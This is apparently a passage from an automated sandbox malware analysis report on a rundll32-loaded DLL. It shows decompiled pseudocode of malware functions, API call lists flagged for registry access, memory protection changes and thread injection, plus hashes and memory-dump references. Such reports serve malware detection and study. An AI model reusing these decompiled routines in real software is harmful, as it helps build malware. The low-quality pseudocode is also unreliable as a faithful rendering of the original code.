                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 3fbfff1884876c417af9a5bcc32702407572e8faa712a20466410c8ce5272fd6
                                • Instruction ID: 596fb4181049a80a812593d0483f82308df16f3bdb9d3791e78be732f11bee2b
                                • Opcode Fuzzy Hash: 3fbfff1884876c417af9a5bcc32702407572e8faa712a20466410c8ce5272fd6
                                • Instruction Fuzzy Hash: 6651DF79A41215AFDB11FFA5D88ABAF77F8EB0EB00F08046BE541EF244D7B195408B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034319E2 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E034319E2(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E03436D63(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E03436C2C(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E03436D63((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x343a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x034319e9
                                0x034319f0
                                0x034319f5
                                0x034319f8
                                0x034319ff
                                0x03431a02
                                0x03431a05
                                0x03431a0a
                                0x03431a0f
                                0x03431b63
                                0x03431b65
                                0x03431b67
                                0x03431b6c
                                0x03431b6c
                                0x03431a15
                                0x03431a18
                                0x03431a1b
                                0x03431a1d
                                0x03431a1d
                                0x03431a21
                                0x00000000
                                0x00000000
                                0x03431a25
                                0x03431a51
                                0x03431a56
                                0x03431a58
                                0x03431a58
                                0x03431a5b
                                0x03431a5e
                                0x03431a5e
                                0x03431a60
                                0x00000000
                                0x03431a2b
                                0x03431a2d
                                0x03431a4c
                                0x03431a4c
                                0x03431a63
                                0x03431a63
                                0x03431a64
                                0x03431a64
                                0x03431a67
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03431a67
                                0x03431a31
                                0x03431a78
                                0x03431a7c
                                0x03431b56
                                0x03431b58
                                0x03431b58
                                0x03431b59
                                0x03431b5c
                                0x00000000
                                0x03431b5c
                                0x03431a85
                                0x03431a96
                                0x03431a9a
                                0x03431b52
                                0x00000000
                                0x03431b52
                                0x03431aa0
                                0x03431aa3
                                0x03431aa7
                                0x03431aab
                                0x03431ab0
                                0x03431b48
                                0x03431b48
                                0x00000000
                                0x03431b4e
                                0x03431abb
                                0x03431ac4
                                0x03431ad8
                                0x03431adf
                                0x03431af4
                                0x03431afa
                                0x03431b02
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03431b04
                                0x03431b04
                                0x03431b04
                                0x03431b0b
                                0x03431b13
                                0x00000000
                                0x00000000
                                0x03431b15
                                0x03431b1e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x03431b20
                                0x03431b22
                                0x03431b25
                                0x03431b25
                                0x03431b28
                                0x03431b2c
                                0x03431b2f
                                0x03431b35
                                0x03431b38
                                0x03431b3f
                                0x00000000
                                0x03431abb
                                0x03431a36
                                0x03431a3e
                                0x03431a44
                                0x03431a46
                                0x03431a46
                                0x03431a49
                                0x03431a4b
                                0x00000000
                                0x03431a4b
                                0x03431a25
                                0x03431a6b
                                0x03431a70
                                0x03431a72
                                0x03431a72
                                0x03431a75
                                0x03431a75
                                0x00000000

                                APIs
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 03431ADF
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 03431AF4
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 03431B0B
                                • lstrlen.KERNEL32(69B25F45), ref: 03431B2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: a926355b43fa860230c82a54ce46bc24e03090f0523bfe154459bb80017a3b1a
                                • Instruction ID: 727d950ab497bc4192c12dcb03b23ee6b739f7d021c2cff1776125bf0f977cb8
                                • Opcode Fuzzy Hash: a926355b43fa860230c82a54ce46bc24e03090f0523bfe154459bb80017a3b1a
                                • Instruction Fuzzy Hash: E6518031A00208EBDB21EF99C5846AEFBB6EF4A311F19805BE815AF311D7709A41CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0343498E Relevance: 7.6, APIs: 5, Instructions: 96synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0343498E(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x343a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x343a348; // 0x21ad5a8
				_t3 = _t8 + 0x343b87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E034311C3(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x343a34c, 1, 0, _t30);
					E03436C2C(_t30);
				}
				_t12 =  *0x343a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E0343402A(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E034368BD(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E03437928(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								FindCloseChangeNotification(_t25); // executed
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

















                                0x0343498f
                                0x03434996
                                0x034349a0
                                0x034349a4
                                0x034349aa
                                0x034349b9
                                0x034349c0
                                0x034349c4
                                0x034349d6
                                0x034349d8
                                0x034349d8
                                0x034349dd
                                0x034349e4
                                0x03434a3b
                                0x03434a3b
                                0x03434a41
                                0x03434a43
                                0x03434a43
                                0x03434a48
                                0x03434a4d
                                0x03434a51
                                0x03434a63
                                0x03434a63
                                0x03434a67
                                0x03434a6d
                                0x03434a6d
                                0x00000000
                                0x034349f4
                                0x034349f4
                                0x034349fb
                                0x00000000
                                0x00000000
                                0x03434a02
                                0x03434a0a
                                0x03434a0e
                                0x03434a12
                                0x03434a12
                                0x03434a1a
                                0x03434a1f
                                0x03434a23
                                0x03434a27
                                0x03434a7c
                                0x03434a82
                                0x03434a82
                                0x03434a35
                                0x03434a39
                                0x03434a70
                                0x03434a72
                                0x03434a75
                                0x03434a75
                                0x00000000
                                0x03434a72
                                0x03434a39
                                0x00000000
                                0x03434a23

                                APIs
                                  • Part of subcall function 034311C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,055E9D70,00000000,?,?,69B25F44,00000005,0343A00C,4D283A53,?,?), ref: 034311F9
                                  • Part of subcall function 034311C3: lstrcpy.KERNEL32(00000000,00000000), ref: 0343121D
                                  • Part of subcall function 034311C3: lstrcat.KERNEL32(00000000,00000000), ref: 03431225
                                • CreateEventA.KERNEL32(0343A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,03437187,?,?,?), ref: 034349CF
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • StrChrW.SHLWAPI(03437187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,03437187,?,?,?), ref: 03434A02
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,03437187,00000000,00000000,?,00000000,?,03437187,?,?,?), ref: 03434A2F
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,03437187,?,?,?), ref: 03434A5D
                                • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,03437187,?,?,?), ref: 03434A75
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 3294472205-0
                                • Opcode ID: 9bc462d022b32c24c5fb5c881694f78faedcc73353df90d03d6ad780d26a42dc
                                • Instruction ID: 6ab035a0c6c9baf0cbb7be6d7b638de0170c6bd4097654aa4b13e77c993d72c5
                                • Opcode Fuzzy Hash: 9bc462d022b32c24c5fb5c881694f78faedcc73353df90d03d6ad780d26a42dc
                                • Instruction Fuzzy Hash: 5021F5325003116BD731FAAA9885BEBB6E9EF4E710B19061BFD41EF345DB61C800868C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03491ECA Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0348B7A4: RegCreateKeyA.ADVAPI32(80000001,0616B7F0,?), ref: 0348B7B9
                                  • Part of subcall function 0348B7A4: lstrlen.KERNEL32(0616B7F0,00000000,00000000,00000000,?,0348A2EB,00000001,?,00000000,00000000,00000000,?,0347109E,03499F2C,00000008,00000003), ref: 0348B7E2
                                • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F4C
                                • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                • String ID:
                                • API String ID: 1633053242-0
                                • Opcode ID: a17200d51312671563be1d2536eda41d52eb7f30304c10ed91ad5e1473ecb262
                                • Instruction ID: 403296dae2da9c4544a9ce6f8627c01fc197def5e37d891fe68603b9adb843da
                                • Opcode Fuzzy Hash: a17200d51312671563be1d2536eda41d52eb7f30304c10ed91ad5e1473ecb262
                                • Instruction Fuzzy Hash: D7118EB210014DBFEF01AF94CC84CAE7FBDFB88254B15046BF906AB210E7319D549B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348212C Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(?,?,?,?,?,0347111D,00000000), ref: 0348214D
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03482166
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0347111D,00000000), ref: 03482183
                                • IsWow64Process.KERNEL32(?,?,?,?,?,?,0347111D,00000000), ref: 03482194
                                • FindCloseChangeNotification.KERNEL32(?,?,?,?,0347111D,00000000), ref: 034821A7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                                • String ID:
                                • API String ID: 1712524627-0
                                • Opcode ID: 0e6b4288a9b1878a125b83fccc24f50eb1e4005bf4391bef87408d8bfece6961
                                • Instruction ID: 655c9f3beafa17b24e1eb678a653439aeeee8cb3208b6827db09aabaddbb0805
                                • Opcode Fuzzy Hash: 0e6b4288a9b1878a125b83fccc24f50eb1e4005bf4391bef87408d8bfece6961
                                • Instruction Fuzzy Hash: 95018071900604FFCB11FF55D84989EBBE8FB997917384667E905EF208E7708A41CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034733A5 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 034733CA
                                • GetLastError.KERNEL32(?,00000000), ref: 034733D2
                                • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 034733E9
                                • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0347340E
                                • SetLastError.KERNEL32(80000000,?,00000000), ref: 03473417
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$ErrorLastProtect$Query
                                • String ID:
                                • API String ID: 148356745-0
                                • Opcode ID: 656482e7a162b49b0de87769d0fadd0d1f2d7d6ea91461c5118616454c549683
                                • Instruction ID: 57e536402084620f5c7f12fbb7e658607de95edbac97b432f0125a2859518829
                                • Opcode Fuzzy Hash: 656482e7a162b49b0de87769d0fadd0d1f2d7d6ea91461c5118616454c549683
                                • Instruction Fuzzy Hash: 1E012576500219BFDF12AF95DC448EEBBBDEF19254B048027FA01EA224E771D914ABA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348ED07 Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 0348ED35
                                • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0348EDBF
                                • WaitForSingleObject.KERNEL32(00000064), ref: 0348EDCD
                                • SuspendThread.KERNEL32(?), ref: 0348EDE0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                • String ID:
                                • API String ID: 3168247402-0
                                • Opcode ID: 25b5d199696b414aa1ccb8ed6c46131a026f151c869f8db8336c25bb49e184f6
                                • Instruction ID: e7c3c1b0ed6cf4667781b5eaa16686e4e55f778f2164be3b2da79eb2c4c5e282
                                • Opcode Fuzzy Hash: 25b5d199696b414aa1ccb8ed6c46131a026f151c869f8db8336c25bb49e184f6
                                • Instruction Fuzzy Hash: 82416A71104301AFE721EF55C840A6FBBE9EF88714F14492EFA949A260D731D954CB66
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034374FE Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 0343755B
                                • SysAllocString.OLEAUT32(03433520), ref: 0343759F
                                • SysFreeString.OLEAUT32(00000000), ref: 034375B3
                                • SysFreeString.OLEAUT32(00000000), ref: 034375C1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 9e97e59588429ba5223e68f6a130c70e4dba237638d5e80d6de7be5f435fa29e
                                • Instruction ID: 5c0c907d141c8b24137bb8208ae16d80ba7b83f06d01033a46ce8ad7fbbf9db6
                                • Opcode Fuzzy Hash: 9e97e59588429ba5223e68f6a130c70e4dba237638d5e80d6de7be5f435fa29e
                                • Instruction Fuzzy Hash: 50311DB6900249EFCB05DF98D8C09EEBBB9FF49340B24842EF946EB250D7709641CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034370D8 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E034370D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E034354BB(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E034378BF(_t23);
						}
					}
					return _t38;
				}
				_t26 = E03433695(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x343a34c, 1, 0,  *0x343a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					FindCloseChangeNotification(_t40); // executed
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E034371B6(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E03433472(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E03433AC2(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E0343498E( &_v32, _t39);
					goto L13;
				}
			}














                                0x034370d8
                                0x034370e5
                                0x034370eb
                                0x034370ec
                                0x034370ed
                                0x034370ee
                                0x034370ef
                                0x034370f3
                                0x034370fa
                                0x034370ff
                                0x03437103
                                0x0343718b
                                0x0343718b
                                0x0343718e
                                0x03437190
                                0x03437198
                                0x0343719e
                                0x034371a1
                                0x034371a1
                                0x0343719e
                                0x034371ac
                                0x034371ac
                                0x0343710f
                                0x03437116
                                0x03437118
                                0x03437118
                                0x0343712f
                                0x03437133
                                0x03437136
                                0x03437141
                                0x03437148
                                0x03437148
                                0x03437151
                                0x03437155
                                0x03437163
                                0x03437157
                                0x03437157
                                0x03437158
                                0x03437159
                                0x0343715a
                                0x0343715b
                                0x0343715c
                                0x0343715c
                                0x03437168
                                0x0343716b
                                0x0343716f
                                0x03437171
                                0x03437171
                                0x03437178
                                0x00000000
                                0x0343717a
                                0x0343717a
                                0x03437187
                                0x00000000
                                0x03437187

                                APIs
                                • CreateEventA.KERNEL32(0343A34C,00000001,00000000,00000040,?,?,76CDF710,00000000,76CDF730), ref: 03437129
                                • SetEvent.KERNEL32(00000000), ref: 03437136
                                • Sleep.KERNEL32(00000BB8), ref: 03437141
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 03437148
                                  • Part of subcall function 034371B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,03437168,?), ref: 034371DC
                                  • Part of subcall function 034371B6: RegEnumKeyExA.KERNEL32(?,?,?,03437168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,03437168), ref: 03437223
                                  • Part of subcall function 034371B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,03437168,?,03437168,?,?,?,?,?,03437168,?), ref: 03437290
                                  • Part of subcall function 034371B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,03437168,?), ref: 034372B8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                                • String ID:
                                • API String ID: 780868161-0
                                • Opcode ID: 5b1c96a3a946043bcd773a348d8924ad8364e5eef3b3de9cf65c1d432b5746ca
                                • Instruction ID: 2bac945ec7afe220332996227a263570dc04aed302c92ab1a466606c5c7f7670
                                • Opcode Fuzzy Hash: 5b1c96a3a946043bcd773a348d8924ad8364e5eef3b3de9cf65c1d432b5746ca
                                • Instruction Fuzzy Hash: 482165B7900215AFDF20FFA588849DFBBB99B4E250B044426EA91AF300D77499458B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034312CA Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E034312CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E03436D63(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E03436C2C(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E03436500(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                0x034312d6
                                0x034312f9
                                0x03431303
                                0x03431309
                                0x0343130d
                                0x03431325
                                0x0343132a
                                0x03431372
                                0x0343132c
                                0x03431334
                                0x03431338
                                0x0343136f
                                0x0343133a
                                0x0343134c
                                0x03431350
                                0x03431366
                                0x03431352
                                0x03431355
                                0x03431357
                                0x0343135c
                                0x03431361
                                0x03431361
                                0x0343135c
                                0x03431350
                                0x03431338
                                0x0343137a
                                0x0343137a
                                0x03431381
                                0x03431387
                                0x03431387
                                0x034312ef
                                0x034312f3
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RegOpenKeyW.ADVAPI32(80000002,055E9E92,055E9E92), ref: 03431303
                                • RegQueryValueExW.KERNEL32(055E9E92,?,00000000,80000002,00000000,00000000,?,03433551,3D034390,80000002,03437168,00000000,03437168,?,055E9E92,80000002), ref: 03431325
                                • RegQueryValueExW.ADVAPI32(055E9E92,?,00000000,80000002,00000000,00000000,00000000,?,03433551,3D034390,80000002,03437168,00000000,03437168,?,055E9E92), ref: 0343134A
                                • RegCloseKey.KERNEL32(055E9E92,?,03433551,3D034390,80000002,03437168,00000000,03437168,?,055E9E92,80000002,00000000,?), ref: 0343137A
                                  • Part of subcall function 03436500: SafeArrayDestroy.OLEAUT32(00000000), ref: 03436588
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
